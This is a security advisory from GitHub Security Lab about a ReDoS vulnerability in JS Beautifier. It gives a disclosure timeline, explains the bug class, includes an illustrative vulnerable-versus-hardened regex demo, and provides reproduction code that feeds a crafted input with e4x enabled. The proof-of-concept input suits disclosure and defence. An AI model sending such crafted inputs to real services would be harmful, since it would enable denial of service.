Coordinated Disclosure Timeline
- 2021-08-31: Sent report to bitwiseman@beautifier.io
- 2021-10-14: The project has GitHub code scanning enabled, so this bug is listed in its code scanning results.
- 2021-10-14: Sent a follow-up email to bitwiseman@beautifier.io with my suggested fix.
- 2021-11-30: Disclosure deadline expired.
- 2021-12-06: Created a pull request to fix the bug, but it turned out that my fix was incorrect.
- 2021-12-09: Created a new pull request to fix the bug, which was successful.
Summary
JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
JS Beautifier
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability in inefficient regular expressions: a backtracking regex engine can take exponential (or high-polynomial) time to reject a crafted input string, so an attacker who controls that input can keep the process busy for an arbitrarily long time.
This vulnerability was found using a CodeQL query that identifies inefficient regular expressions.
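The following is an added example, not code from the advisory or from the js-beautify project, and the two patterns in it are constructed for illustration rather than being the jsbeautifier expression. It shows the failure mode in the paragraph above: a repetition whose separator may be empty lets a backtracking engine carve the same run of characters into exponentially many groups before it gives up on a non-matching input, while an equivalent pattern that forces a separator rejects the same input in linear time.

```python
import re
import time

# Constructed illustration of a ReDoS-prone pattern. This is NOT the regular
# expression from jsbeautifier, only a pattern with the same failure mode.
# Intended language for both: a tag name followed by whitespace-separated
# attribute names, e.g. "<a b c>".
VULNERABLE = re.compile(r"^<\w+(\s*\w+)*\s*>$")  # \s* may be empty -> ambiguous split
HARDENED = re.compile(r"^<\w+(\s+\w+)*\s*>$")    # \s+ forces a separator -> unambiguous

# Both patterns accept exactly the same strings; only their backtracking behaviour differs.


def attack_input(n: int) -> str:
    """Constructed malicious input: a long run of word characters that the
    ambiguous pattern can split into 2**n attribute groups, followed by a
    character that makes the overall match fail, so every split is tried."""
    return "<a" + "b" * n + "!"


def matches(pattern, text: str) -> bool:
    """True if the whole of text is accepted by the compiled pattern."""
    return pattern.match(text) is not None


def time_match(pattern, text: str) -> float:
    """Seconds spent running pattern.match on text (the result is discarded)."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


def sweep(pattern, sizes):
    """Time the pattern against attack inputs of increasing size; returns (n, seconds) pairs."""
    return [(n, time_match(pattern, attack_input(n))) for n in sizes]


if __name__ == "__main__":
    # Both patterns agree on well-formed input...
    for text in ("<a>", "<a b c>", "<tag attr1 attr2 >"):
        assert matches(VULNERABLE, text) and matches(HARDENED, text)
    # ...but only the ambiguous one blows up on the crafted input: each step
    # of n roughly doubles the time for VULNERABLE and barely moves HARDENED.
    for label, pattern in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label)
        for n, secs in sweep(pattern, range(12, 19)):
            print(f"  n={n:2d}  {secs * 1000:8.2f} ms")
```

The fix class is the same as the one used for a real ReDoS: remove the ambiguity (here, by requiring at least one whitespace character between attributes) without changing the set of accepted strings, or cap the length of attacker-controlled input before it reaches the regex.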
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install jsbeautifier:

```shell
pip3 install jsbeautifier
```

- Run the following with python3. The e4x option enables E4X XML-literal support, which the crafted input needs in order to reach the vulnerable expression:

```python
import jsbeautifier

# Crafted input: a long run of repeated "{a}" groups followed by "{>", which
# never closes; beautifying it with e4x enabled takes a very long time.
src = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''
print(jsbeautifier.beautify(src, {'e4x': True}))
```
Impact
Beautifying attacker-controlled input with the e4x option enabled can take an excessive amount of time, so this issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-113 in any communication regarding this issue.